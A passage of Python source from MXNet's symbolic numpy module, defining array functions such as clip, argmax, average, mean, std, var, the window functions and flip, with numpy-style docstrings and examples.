Notes ----- NaN in the orginal `numpy` is denoted as nan and will be ignored. Don't use `min` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``minimum(a[0], a[1])`` is faster than ``min(a, axis=0)``. """ return _npi.amin(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def all(a, axis=None, out=None, keepdims=False): """ Test whether all array elements along a given axis evaluate to True. Parameters ---------- a : _Symbol Input array or object that can be converted to an array. axis : None or int or tuple of ints, optional Axis or axes along which a logical AND reduction is performed. The default (axis = None) is to perform a logical AND over all the dimensions of the input array. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. out : ndarray, optional Alternate output array in which to place the result. It must have the same shape as the expected output and its type is preserved Returns -------- all : _Symbol, bool A new boolean or array is returned unless out is specified, in which case a reference to out is returned. """ return _npi.all(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def any(a, axis=None, out=None, keepdims=False): """ Test whether any array element along a given axis evaluates to True. Returns single boolean unless axis is not None Parameters ---------- a : _Symbol Input array or object that can be converted to an array. axis : None or int or tuple of ints, optional Axis or axes along which a logical AND reduction is performed. The default (axis = None) is to perform a logical AND over all the dimensions of the input array. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. 
With this option, the result will broadcast correctly against the input array. out : ndarray, optional Alternate output array in which to place the result. It must have the same shape as the expected output and its type is preserved Returns -------- any : bool or _Symbol A new boolean or ndarray is returned unless out is specified, in which case a reference to out is returned. """ return _npi.any(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def clip(a, a_min, a_max, out=None): """clip(a, a_min, a_max, out=None) Clip (limit) the values in an array. Given an interval, values outside the interval are clipped to the interval edges. For example, if an interval of ``[0, 1]`` is specified, values smaller than 0 become 0, and values larger than 1 become 1. Parameters ---------- a : _Symbol Array containing elements to clip. a_min : scalar or `None` Minimum value. If `None`, clipping is not performed on lower interval edge. Not more than one of `a_min` and `a_max` may be `None`. a_max : scalar or `None` Maximum value. If `None`, clipping is not performed on upper interval edge. Not more than one of `a_min` and `a_max` may be `None`. out : _Symbol or `None` The results will be placed in this array. It may be the input array for in-place clipping. `out` must be of the right shape to hold the output. Its type is preserved. Returns ------- clipped_array : _Symbol An array with the elements of `a`, but where values < `a_min` are replaced with `a_min`, and those > `a_max` with `a_max`. Notes ----- array_like `a_min` and `a_max` are not supported. """ if a_min is None and a_max is None: raise ValueError('array_clip: must set either max or min') if a_min is None: a_min = float('-inf') if a_max is None: a_max = float('inf') return _npi.clip(a, a_min, a_max, out=out) @set_module('mxnet.symbol.numpy') def swapaxes(a, axis1, axis2): """Interchange two axes of an array. Parameters ---------- a : _Symbol Input array. axis1 : int First axis. 
axis2 : int Second axis. Returns ------- a_swapped : _Symbol Swapped array symbol. """ return _npi.swapaxes(a, dim1=axis1, dim2=axis2) @set_module('mxnet.symbol.numpy') def argmax(a, axis=None, out=None): r""" Returns the indices of the maximum values along an axis. Parameters ---------- a : _Symbol Input array. Only support dtype `float16`, `float32`, and `float64`. axis : int, optional By default, the index is into the flattened array, otherwise along the specified axis. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- index_array : _Symbol of indices whose dtype is same as the input ndarray. Array of indices into the array. It has the same shape as `a.shape` with the dimension along `axis` removed. Notes ----- In case of multiple occurrences of the maximum values, the indices corresponding to the first occurrence are returned. This function differs from the original `numpy.argmax <https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html>`_ in the following aspects: - Input type does not support Python native iterables(list, tuple, ...). - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` symnbol's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _npi.argmax(a, axis=axis, keepdims=False, out=out) @set_module('mxnet.symbol.numpy') def argmin(a, axis=None, out=None): r""" Returns the indices of the minimum values along an axis. Parameters ---------- a : _Symbol Input array. Only support dtype `float16`, `float32`, and `float64`. axis : int, optional By default, the index is into the flattened array, otherwise along the specified axis. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. 
    Returns
    -------
    index_array : _Symbol of indices whose dtype is same as the input ndarray.
        Array of indices into the array. It has the same shape as `a.shape`
        with the dimension along `axis` removed.

    Notes
    -----
    In case of multiple occurrences of the minimum values, the indices
    corresponding to the first occurrence are returned.

    This function differs from the original `numpy.argmin
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmin.html>`_ in
    the following aspects:

    - Input type does not support Python native iterables(list, tuple, ...).
    - ``out`` param: cannot perform auto broadcasting. ``out`` symbol's shape must be
      the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` symbol's dtype must be
      the same as the expected output.
    - ``out`` param does not support scalar input case.
    """
    # keepdims is fixed to False to match numpy.argmin semantics (the reduced
    # axis is removed from the output shape).
    return _npi.argmin(a, axis=axis, keepdims=False, out=out)


def average(a, axis=None, weights=None, returned=False, out=None):
    """
    Compute the weighted average along the specified axis.

    Parameters
    --------
    a : _Symbol
        Array containing data to be averaged.
    axis : None or int or tuple of ints, optional
        Axis or axes along which to average a.
        The default, axis=None, will average over
        all of the elements of the input array.
        If axis is negative it counts from the last to the first axis.
        New in version 1.7.0.
        If axis is a tuple of ints, averaging is
        performed on all of the axes specified in the tuple
        instead of a single axis or all the axes as before.
    weights : _Symbol, optional
        An array of weights associated with the values in a, must be the same dtype with a.
        Each value in a contributes to the average according to its associated weight.
        The weights array can either be 1-D (in which case its length must be
        the size of a along the given axis) or of the same shape as a.
        If weights=None, then all data in a are assumed to have a weight equal to one.
        The 1-D calculation is: avg = sum(a * weights) / sum(weights)
        The only constraint on weights is that sum(weights) must not be 0.
    returned : bool, optional
        Default is False.
        If True, the tuple (average, sum_of_weights) is returned,
        otherwise only the average is returned.
        If weights=None, sum_of_weights is equivalent to
        the number of elements over which the average is taken.
    out : _Symbol, optional
        If provided, the calculation is done into this array.

    Returns
    --------
    retval, [sum_of_weights] : _Symbol
        Return the average along the specified axis.
        When returned is True, return a tuple with the average as the first element
        and the sum of the weights as the second element. sum_of_weights is of the
        same type as retval.
        If a is integral, the result dtype will be your current default dtype,
        When npx.is_np_default_dtype() returns False, default dtype is float32,
        When npx.is_np_default_dtype() returns True, default dtype is float64;
        otherwise it will be the same as dtype of a.

    Raises
    --------
        MXNetError
        - When all weights along axis sum to zero.
        - When the length of 1D weights is not the same as the shape of a along axis.
        - When given 1D weights, the axis is not specified or is not int.
        - When the shape of weights and a differ, but weights are not 1D.

    See also
    --------
        mean

    Notes
    --------
        This function differs from the original `numpy.average`
        <https://numpy.org/devdocs/reference/generated/numpy.average.html>`_ in
        the following way(s):

        - Does not guarantee the same behavior with numpy when given float16 dtype and overflow happens
        - Does not support complex dtype
        - The dtypes of a and weights must be the same
        - Integral a results in float32 or float64 returned dtype, which depends on your current default dtype

    Examples
    --------
    >>> data = np.arange(1, 5)
    >>> data
    array([1., 2., 3., 4.])
    >>> np.average(data)
    array(2.5)
    >>> np.average(np.arange(1, 11), weights=np.arange(10, 0, -1))
    array(4.)
    >>> data = np.arange(6).reshape((3,2))
    >>> data
    array([[0., 1.],
           [2., 3.],
           [4., 5.]])
    >>> weights = np.array([0.25, 0.75])
    array([0.25, 0.75])
    >>> np.average(data, axis=1, weights=weights)
    array([0.75, 2.75, 4.75])
    """
    if weights is None:
        # Unweighted path: tell the backend explicitly that no weighting is
        # required (weighted=False) instead of synthesizing a weight array.
        return _npi.average(a, axis=axis, weights=None, returned=returned,
                            weighted=False, out=out)
    else:
        return _npi.average(a, axis=axis, weights=weights, returned=returned, out=out)


@set_module('mxnet.symbol.numpy')
def mean(a, axis=None, dtype=None, out=None, keepdims=False):  # pylint: disable=arguments-differ
    """
    mean(a, axis=None, dtype=None, out=None, keepdims=None)

    Compute the arithmetic mean along the specified axis.
    Returns the average of the array elements.
    The average is taken over the flattened array by default,
    otherwise over the specified axis.

    Parameters
    ----------
    a : `_Symbol`
        _Symbol containing numbers whose mean is desired.
    axis : None or int or tuple of ints, optional
        Axis or axes along which the means are computed. The default is to compute
        the mean of the flattened array. If this is a tuple of ints, a mean is
        performed over multiple axes, instead of a single axis or all the axes as before.
    dtype : data-type, optional
        Type to use in computing the mean. For integer inputs,
        When npx.is_np_default_dtype() returns False, default dtype is float32,
        When npx.is_np_default_dtype() returns True, default dtype is float64;
        for floating point inputs, it is the same as the input dtype.
    out : _Symbol, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.
    keepdims : bool, optional
        If this is set to True, the axes which are reduced are left
        in the result as dimensions with size one. With this option,
        the result will broadcast correctly against the input array.
        If the default value is passed, then keepdims will not be
        passed through to the mean method of sub-classes of
        _Symbol, however any non-default value will be. If the
        sub-class method does not implement keepdims any
        exceptions will be raised.
    Returns
    -------
    m : _Symbol, see dtype parameter above
        If out=None, returns a new array containing the mean values,
        otherwise a reference to the output array is returned.

    Notes
    -----
    This function differs from the original `numpy.mean
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_ in
    the following way(s):

    - only _Symbol is accepted as valid input, python iterables or scalar is not supported
    - default data type for integer input is float32 or float64, which depends on your current default dtype

    Examples
    --------
    >>> a = np.array([[1, 2], [3, 4]])
    >>> np.mean(a)
    array(2.5)
    >>> a = np.zeros((2, 512*512), dtype=np.float32)
    >>> a[0,:] = 1.0
    >>> a[1,:] = 0.1
    >>> np.mean(a)
    array(0.55)
    >>> np.mean(a, dtype=np.float64)
    array(0.55)
    """
    return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out)


@set_module('mxnet.symbol.numpy')
def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):  # pylint: disable=too-many-arguments
    """
    Compute the standard deviation along the specified axis.
    Returns the standard deviation, a measure of the spread of a distribution,
    of the array elements. The standard deviation is computed for the
    flattened array by default, otherwise over the specified axis.

    Parameters
    ----------
    a : `_Symbol`
        _Symbol containing numbers whose standard deviation is desired.
    axis : None or int or tuple of ints, optional
        Axis or axes along which the standard deviations are computed.
        The default is to compute the standard deviation of the flattened array.
        If this is a tuple of ints, computation is performed over multiple axes,
        instead of a single axis or all the axes as before.
    dtype : data-type, optional
        Type to use in computing the standard deviation. For integer inputs, the default is float32;
        for floating point inputs, it is the same as the input dtype.
    out : _Symbol, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.
    ddof : int, optional
        Delta degrees of freedom, forwarded to the backend operator
        (numpy semantics: the divisor used is ``N - ddof``; default 0).
    keepdims : bool, optional
        If this is set to True, the axes which are reduced are left
        in the result as dimensions with size one. With this option,
        the result will broadcast correctly against the input array.
        If the default value is passed, then keepdims will not be
        passed through to the mean method of sub-classes of
        _Symbol, however any non-default value will be. If the
        sub-class method does not implement keepdims any
        exceptions will be raised.

    Returns
    -------
    m : _Symbol, see dtype parameter above
        If out=None, returns a new array containing the standard deviation values,
        otherwise a reference to the output array is returned.

    Notes
    -----
    This function differs from the original `numpy.std
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.std.html>`_ in
    the following way(s):

    - only _Symbol is accepted as valid input, python iterables or scalar is not supported
    - default output data type for integer input is float32
    """
    return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)


@set_module('mxnet.symbol.numpy')
def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):  # pylint: disable=too-many-arguments
    """
    Compute the variance along the specified axis.
    Returns the variance of the array elements, a measure of the spread of a
    distribution. The variance is computed for the flattened array by
    default, otherwise over the specified axis.

    Parameters
    ----------
    a : `_Symbol`
        _Symbol containing numbers whose variance is desired.
    axis : None or int or tuple of ints, optional
        Axis or axes along which the variance is computed.
        The default is to compute the variance of the flattened array.
        If this is a tuple of ints, computation is performed over multiple axes,
        instead of a single axis or all the axes as before.
    dtype : data-type, optional
        Type to use in computing the variance.
        For arrays of integer type,
        When npx.is_np_default_dtype() returns False, default dtype is float32,
        When npx.is_np_default_dtype() returns True, default dtype is float64;
        For arrays of float types it is the same as the array type.
    out : _Symbol, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.
    ddof : int, optional
        Delta degrees of freedom, forwarded to the backend operator
        (numpy semantics: the divisor used is ``N - ddof``; default 0).
    keepdims : bool, optional
        If this is set to True, the axes which are reduced are left
        in the result as dimensions with size one. With this option,
        the result will broadcast correctly against the input array.
        If the default value is passed, then keepdims will not be
        passed through to the mean method of sub-classes of
        _Symbol, however any non-default value will be. If the
        sub-class method does not implement keepdims any
        exceptions will be raised.

    Returns
    -------
    m : _Symbol, see dtype parameter above
        If out=None, returns a new array containing the variance values,
        otherwise a reference to the output array is returned.

    Notes
    -----
    This function differs from the original `numpy.var
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.var.html>`_ in
    the following way(s):

    - only _Symbol is accepted as valid input, python iterables or scalar is not supported
    - default output data type for integer input is float32
    """
    return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)


# pylint: disable=redefined-outer-name
@set_module('mxnet.symbol.numpy')
def indices(dimensions, dtype=None, ctx=None):
    """Return an array representing the indices of a grid.

    Compute an array where the subarrays contain index values 0,1,...
    varying only along the corresponding axis.

    Parameters
    ----------
    dimensions : sequence of ints
        The shape of the grid.
    dtype : data-type, optional
        The desired data-type for the array. Default is `int64`.
    ctx : device context, optional
        Device context on which the memory is allocated. Default is
        `mxnet.context.current_context()`.
    Returns
    -------
    grid : _Symbol
        The array of grid indices,
        ``grid.shape = (len(dimensions),) + tuple(dimensions)``.

    Notes
    -----
    The output shape is obtained by prepending the number of dimensions
    in front of the tuple of dimensions, i.e. if `dimensions` is a tuple
    ``(r0, ..., rN-1)`` of length ``N``, the output shape is
    ``(N,r0,...,rN-1)``.

    The subarrays ``grid[k]`` contains the N-D array of indices along the
    ``k-th`` axis. Explicitly::

        grid[k,i0,i1,...,iN-1] = ik

    Examples
    --------
    >>> grid = np.indices((2, 3))
    >>> grid.shape
    (2, 2, 3)
    >>> grid[0]        # row indices
    array([[0, 0, 0],
           [1, 1, 1]], dtype=int64)
    >>> grid[1]        # column indices
    array([[0, 1, 2],
           [0, 1, 2]], dtype=int64)

    The indices can be used as an index into an array.

    >>> x = np.arange(20).reshape(5, 4)
    >>> row, col = np.indices((2, 3))
    >>> x[row, col]
    array([[0., 1., 2.],
           [4., 5., 6.]])

    Note that it would be more straightforward in the above example to
    extract the required elements directly with ``x[:2, :3]``.
    """
    if isinstance(dimensions, (tuple, list)):
        if ctx is None:
            ctx = current_context()
        return _npi.indices(dimensions=dimensions, dtype=dtype, ctx=ctx)
    else:
        raise ValueError("The dimensions must be sequence of ints")
# pylint: enable=redefined-outer-name


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def copysign(x1, x2, out=None, **kwargs):
    r"""
    Change the sign of x1 to that of x2, element-wise.

    If `x2` is a scalar, its sign will be copied to all elements of `x1`.

    Parameters
    ----------
    x1 : _Symbol or scalar
        Values to change the sign of.
    x2 : _Symbol or scalar
        The sign of `x2` is copied to `x1`.
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    out : _Symbol
        The values of `x1` with the sign of `x2`.
        This is a scalar if both `x1` and `x2` are scalars.

    Notes
    -----
    This function differs from the original `numpy.copysign
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.copysign.html>`_ in
    the following aspects:

    - ``where`` param is not supported.
    """
    return _ufunc_helper(x1, x2, _npi.copysign, _np.copysign, _npi.copysign_scalar, _npi.rcopysign_scalar, out)


@set_module('mxnet.symbol.numpy')
def ravel(x, order='C'):
    r"""
    ravel(x)

    Return a contiguous flattened array.
    A 1-D array, containing the elements of the input, is returned. A copy is
    made only if needed.

    Parameters
    ----------
    x : _Symbol
        Input array. The elements in `x` are read in row-major, C-style order and
        packed as a 1-D array.
    order : `C`, optional
        Only support row-major, C-style order.

    Returns
    -------
    y : _Symbol
        y is an array of the same subtype as `x`, with shape ``(x.size,)``.
        Note that matrices are special cased for backward compatibility, if `x`
        is a matrix, then y is a 1-D ndarray.

    Notes
    -----
    This function differs from the original numpy.ravel in the following aspects:

    - Only support row-major, C-style order.
    """
    if order == 'F':
        raise NotImplementedError('order {} is not supported'.format(order))
    # Dispatch on the input type: Python scalars go through NumPy, symbols
    # through the deferred-mode reshape defined earlier in this module.
    if isinstance(x, numeric_types):
        return _np.reshape(x, -1)
    elif isinstance(x, _Symbol):
        return reshape(x, -1)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))


def unravel_index(indices, shape, order='C'):  # pylint: disable=redefined-outer-name
    """
    Converts a flat index or array of flat indices into a tuple of coordinate arrays.

    Parameters:
    -------------
    indices : _Symbol
        An integer array whose elements are indices into the flattened version
        of an array of dimensions shape. Before version 1.6.0, this function
        accepted just one index value.
    shape : tuple of ints
        The shape of the array to use for unraveling indices.

    Returns:
    -------------
    unraveled_coords : _Symbol
        Each row in the ndarray has the same shape as the indices array.
Each column in the ndarray represents the unravelled index Examples: ------------- >>> np.unravel_index([22, 41, 37], (7,6)) ([3. 6. 6.] [4. 5. 1.]) >>> np.unravel_index(1621, (6,7,8,9)) (3, 1, 4, 1) """ if order == 'C': return _npi.unravel_index_fallback(indices, shape=shape) else: raise NotImplementedError('Don not support column-major (Fortran-style) order at this moment') def flatnonzero(a): r""" Return indices that are non-zero in the flattened version of a. This is equivalent to np.nonzero(np.ravel(a))[0]. Parameters ---------- a : _Symbol Input data. Returns ------- res : _Symbol Output array, containing the indices of the elements of `a.ravel()` that are non-zero. See Also -------- nonzero : Return the indices of the non-zero elements of the input array. ravel : Return a 1-D array containing the elements of the input array. """ out = _npi.nonzero(ravel(a)) return out.reshape(-1,) def diag_indices_from(arr): """ This returns a tuple of indices that can be used to access the main diagonal of an array a with a.ndim >= 2 dimensions and shape (n, n, ..., n). For a.ndim = 2 this is the usual diagonal, for a.ndim > 2 this is the set of indices to access a[i, i, ..., i] for i = [0..n-1]. Parameters: ------------- arr : _Symbol Input array for acessing the main diagonal. All dimensions should have equal length. Return: ------------- diag: _Symbol indices of the main diagonal. Examples: ------------- >>> a = np.arange(16).reshape(4, 4) >>> a array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15]]) >>> idx = np.diag_indices_from(a) >>> idx (array([0, 1, 2, 3]), array([0, 1, 2, 3])) >>> a[idx] = 100 >>> a array([[100, 1, 2, 3], [ 4, 100, 6, 7], [ 8, 9, 100, 11], [ 12, 13, 14, 100]]) """ return _npi.diag_indices_from(arr) @set_module('mxnet.symbol.numpy') def hanning(M, dtype=None, ctx=None): r"""Return the Hanning window. The Hanning window is a taper formed by using a weighted cosine. Parameters ---------- M : int Number of points in the output window. 
If zero or less, an empty array is returned. ctx : Context, optional An optional device context (default is the current default context). Returns ------- out : _Symbol, shape(M,) The window, with the maximum value normalized to one (the value one appears only if `M` is odd). When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Note that you need select numpy.float32 or float64 in this operator. See Also -------- blackman, hamming Notes ----- The Hanning window is defined as .. math:: w(n) = 0.5 - 0.5cos\left(\frac{2\pi{n}}{M-1}\right) \qquad 0 \leq n \leq M-1 The Hanning was named for Julius von Hann, an Austrian meteorologist. It is also known as the Cosine Bell. Some authors prefer that it be called a Hann window, to help avoid confusion with the very similar Hamming window. Most references to the Hanning window come from the signal processing literature, where it is used as one of many windowing functions for smoothing values. It is also known as an apodization (which means "removing the foot", i.e. smoothing discontinuities at the beginning and end of the sampled signal) or tapering function. References ---------- .. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power spectra, Dover Publications, New York. .. [2] E.R. Kanasewich, "Time Sequence Analysis in Geophysics", The University of Alberta Press, 1975, pp. 106-108. .. [3] Wikipedia, "Window function", http://en.wikipedia.org/wiki/Window_function .. [4] W.H. Press, B.P. Flannery, S.A. Teukolsky, and W.T. Vetterling, "Numerical Recipes", Cambridge University Press, 1986, page 425. Examples -------- >>> np.hanning(12) array([0. , 0.07937324, 0.29229254, 0.5711574 , 0.8274304 , 0.9797465 , 0.97974646, 0.82743025, 0.5711573 , 0.29229245, 0.07937312, 0. 
    ])

    Plot the window and its frequency response:

    >>> import matplotlib.pyplot as plt
    >>> window = np.hanning(51)
    >>> plt.plot(window.asnumpy())
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.title("Hann window")
    Text(0.5, 1.0, 'Hann window')
    >>> plt.ylabel("Amplitude")
    Text(0, 0.5, 'Amplitude')
    >>> plt.xlabel("Sample")
    Text(0.5, 0, 'Sample')
    >>> plt.show()
    """
    if ctx is None:
        ctx = current_context()
    return _npi.hanning(M, dtype=dtype, ctx=ctx)


@set_module('mxnet.symbol.numpy')
def hamming(M, dtype=None, ctx=None):
    r"""Return the hamming window.

    The hamming window is a taper formed by using a weighted cosine.

    Parameters
    ----------
    M : int
        Number of points in the output window. If zero or less, an
        empty array is returned.
    ctx : Context, optional
        An optional device context (default is the current default context).

    Returns
    -------
    out : _Symbol, shape(M,)
        The window, with the maximum value normalized to one (the value
        one appears only if `M` is odd).
        When npx.is_np_default_dtype() returns False, default dtype is float32;
        When npx.is_np_default_dtype() returns True, default dtype is float64.
        Note that you need select numpy.float32 or float64 in this operator.

    See Also
    --------
    blackman, hanning

    Notes
    -----
    The Hamming window is defined as

    .. math::  w(n) = 0.54 - 0.46cos\left(\frac{2\pi{n}}{M-1}\right)
               \qquad 0 \leq n \leq M-1

    The Hamming was named for R. W. Hamming, an associate of J. W. Tukey and
    is described in Blackman and Tukey. It was recommended for smoothing the
    truncated autocovariance function in the time domain.

    Most references to the Hamming window come from the signal processing
    literature, where it is used as one of many windowing functions for
    smoothing values. It is also known as an apodization (which means
    "removing the foot", i.e. smoothing discontinuities at the beginning
    and end of the sampled signal) or tapering function.

    References
    ----------
    .. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power
           spectra, Dover Publications, New York.
    .. [2] E.R. Kanasewich, "Time Sequence Analysis in Geophysics", The
           University of Alberta Press, 1975, pp. 109-110.
    .. [3] Wikipedia, "Window function",
           https://en.wikipedia.org/wiki/Window_function
    .. [4] W.H. Press, B.P. Flannery, S.A. Teukolsky, and W.T. Vetterling,
           "Numerical Recipes", Cambridge University Press, 1986, page 425.

    Examples
    --------
    >>> np.hamming(12)
    array([0.08000001, 0.15302339, 0.34890914, 0.6054648 , 0.841236  ,
           0.9813669 , 0.9813668 , 0.8412359 , 0.6054647 , 0.34890908,
           0.15302327, 0.08000001])

    Plot the window and its frequency response:

    >>> import matplotlib.pyplot as plt
    >>> window = np.hamming(51)
    >>> plt.plot(window.asnumpy())
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.title("hamming window")
    Text(0.5, 1.0, 'hamming window')
    >>> plt.ylabel("Amplitude")
    Text(0, 0.5, 'Amplitude')
    >>> plt.xlabel("Sample")
    Text(0.5, 0, 'Sample')
    >>> plt.show()
    """
    if ctx is None:
        ctx = current_context()
    return _npi.hamming(M, dtype=dtype, ctx=ctx)


@set_module('mxnet.symbol.numpy')
def blackman(M, dtype=None, ctx=None):
    r"""Return the Blackman window.

    The Blackman window is a taper formed by using the first three terms of
    a summation of cosines. It was designed to have close to the minimal
    leakage possible. It is close to optimal, only slightly worse than a
    Kaiser window.

    Parameters
    ----------
    M : int
        Number of points in the output window. If zero or less, an
        empty array is returned.
    ctx : Context, optional
        An optional device context (default is the current default context).

    Returns
    -------
    out : _Symbol
        The window, with the maximum value normalized to one (the value one
        appears only if the number of samples is odd).
        When npx.is_np_default_dtype() returns False, default dtype is float32;
        When npx.is_np_default_dtype() returns True, default dtype is float64.
        Note that you need select numpy.float32 or float64 in this operator.
    See Also
    --------
    hamming, hanning

    Notes
    -----
    The Blackman window is defined as

    .. math::  w(n) = 0.42 - 0.5 \cos(2\pi n/{M-1}) + 0.08 \cos(4\pi n/{M-1})

    Most references to the Blackman window come from the signal processing
    literature, where it is used as one of many windowing functions for
    smoothing values. It is also known as an apodization (which means
    "removing the foot", i.e. smoothing discontinuities at the beginning
    and end of the sampled signal) or tapering function. It is known as a
    "near optimal" tapering function, almost as good (by some measures)
    as the kaiser window.

    References
    ----------
    Blackman, R.B. and Tukey, J.W., (1958) The measurement of power spectra,
    Dover Publications, New York.
    Oppenheim, A.V., and R.W. Schafer. Discrete-Time Signal Processing.
    Upper Saddle River, NJ: Prentice-Hall, 1999, pp. 468-471.

    Examples
    --------
    >>> np.blackman(12)
    array([-1.4901161e-08,  3.2606423e-02,  1.5990365e-01,  4.1439798e-01,
            7.3604530e-01,  9.6704686e-01,  9.6704674e-01,  7.3604506e-01,
            4.1439781e-01,  1.5990359e-01,  3.2606363e-02, -1.4901161e-08])

    Plot the window and its frequency response:

    >>> import matplotlib.pyplot as plt
    >>> window = np.blackman(51)
    >>> plt.plot(window.asnumpy())
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.title("blackman window")
    Text(0.5, 1.0, 'blackman window')
    >>> plt.ylabel("Amplitude")
    Text(0, 0.5, 'Amplitude')
    >>> plt.xlabel("Sample")
    Text(0.5, 0, 'Sample')
    >>> plt.show()
    """
    if ctx is None:
        ctx = current_context()
    return _npi.blackman(M, dtype=dtype, ctx=ctx)


@set_module('mxnet.symbol.numpy')
def flip(m, axis=None, out=None):
    r"""
    flip(m, axis=None, out=None)

    Reverse the order of elements in an array along the given axis.

    The shape of the array is preserved, but the elements are reordered.

    Parameters
    ----------
    m : _Symbol or scalar
        Input array.
    axis : None or int or tuple of ints, optional
        Axis or axes along which to flip over. The default,
        axis=None, will flip over all of the axes of the input array.
        If axis is negative it counts from the last to the first axis.
        If axis is a tuple of ints, flipping is performed on all of the axes
        specified in the tuple.
    out : _Symbol or scalar, optional
        Alternative output array in which to place the result. It must have
        the same shape and type as the expected output.

    Returns
    -------
    out : _Symbol or scalar
        A view of `m` with the entries of axis reversed. Since a view is
        returned, this operation is done in constant time.
    """
    # Dispatch: Python scalars are handled eagerly by NumPy; symbols go
    # through the deferred-mode backend operator.
    if isinstance(m, numeric_types):
        return _np.flip(m, axis)
    elif isinstance(m, _Symbol):
        return _npi.flip(m, axis, out=out)
    else:
        raise TypeError('type {} not supported'.format(str(type(m))))


@set_module('mxnet.symbol.numpy')
def flipud(m):
    r"""
    flipud(*args, **kwargs)

    Flip array in the up/down direction.

    Flip the entries in each column in the up/down direction.
    Rows are preserved, but appear in a different order than before.

    Parameters
    ----------
    m : array_like
        Input array.

    Returns
    -------
    out : array_like
        A view of `m` with the rows reversed. Since a view is
        returned, this operation is :math:`\mathcal O(1)`.
    """
    # flipud(m) is flip over axis 0 by definition.
    return flip(m, 0)


@set_module('mxnet.symbol.numpy')
def fliplr(m):
    r"""
    fliplr(*args, **kwargs)

    Flip array in the left/right direction.

    Flip the entries in each row in the left/right direction.
    Columns are preserved, but appear in a different order than before.

    Parameters
    ----------
    m : array_like
        Input array, must be at least 2-D.

    Returns
    -------
    f : ndarray
        A view of `m` with the columns reversed. Since a view is
        returned, this operation is :math:`\mathcal O(1)`.
    """
    # fliplr(m) is flip over axis 1 by definition.
    return flip(m, 1)


@set_module('mxnet.symbol.numpy')
def around(x, decimals=0, out=None, **kwargs):
    r"""
    around(x, decimals=0, out=None)

    Evenly round to the given number of decimals.

    Parameters
    ----------
    x : _Symbol or scalar
        Input data.
    decimals : int, optional
        Number of decimal places to round to (default: 0). If decimals is negative,
        it specifies the number of positions to the left of the decimal point.
    out : _Symbol, optional
        Alternative output array in which to place the result. It must have
        the same shape and type as the expected output.

    Returns
    -------
    rounded_array : _Symbol or scalar
        An array of the same type as `x`, containing the rounded values.
        A reference to the result is returned.

    Notes
    -----
    For values exactly halfway between rounded decimal values, NumPy
    rounds to the nearest even value. Thus 1.5 and 2.5 round to 2.0,
    -0.5 and 0.5 round to 0.0, etc.

    This function differs from the original numpy.around in the following aspects:

    - Cannot cast type automatically. Dtype of `out` must be same as the expected one.
    - Cannot support complex-valued number.
    """
    # Dispatch: Python scalars are rounded eagerly by NumPy; symbols go
    # through the deferred-mode backend operator.
    if isinstance(x, numeric_types):
        return _np.around(x, decimals, **kwargs)
    elif isinstance(x, _Symbol):
        return _npi.around(x, decimals, out=out, **kwargs)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))


@set_module('mxnet.symbol.numpy')
def round(x, decimals=0, out=None, **kwargs):
    r"""
    round(a, decimals=0, out=None)

    Round an array to the given number of decimals.

    See Also
    --------
    around : equivalent function; see for details.
    """
    if isinstance(x, numeric_types):
        return _np.around(x, decimals, **kwargs)
    elif isinstance(x, _Symbol):
        return _npi.around(x, decimals, out=out, **kwargs)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))


@set_module('mxnet.symbol.numpy')
def round_(x, decimals=0, out=None, **kwargs):
    r"""
    round_(a, decimals=0, out=None)

    Round an array to the given number of decimals.

    See Also
    --------
    around : equivalent function; see for details.
    """
    if isinstance(x, numeric_types):
        return _np.around(x, decimals, **kwargs)
    elif isinstance(x, _Symbol):
        return _npi.around(x, decimals, out=out, **kwargs)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def arctan2(x1, x2, out=None, **kwargs):
    r"""
    Element-wise arc tangent of ``x1/x2`` choosing the quadrant correctly.

    The quadrant (i.e., branch) is chosen so that ``arctan2(x1, x2)`` is
    the signed angle in radians between the ray ending at the origin and
    passing through the point (1,0), and the ray ending at the origin and
    passing through the point (`x2`, `x1`).  (Note the role reversal: the
    "`y`-coordinate" is the first function parameter, the "`x`-coordinate"
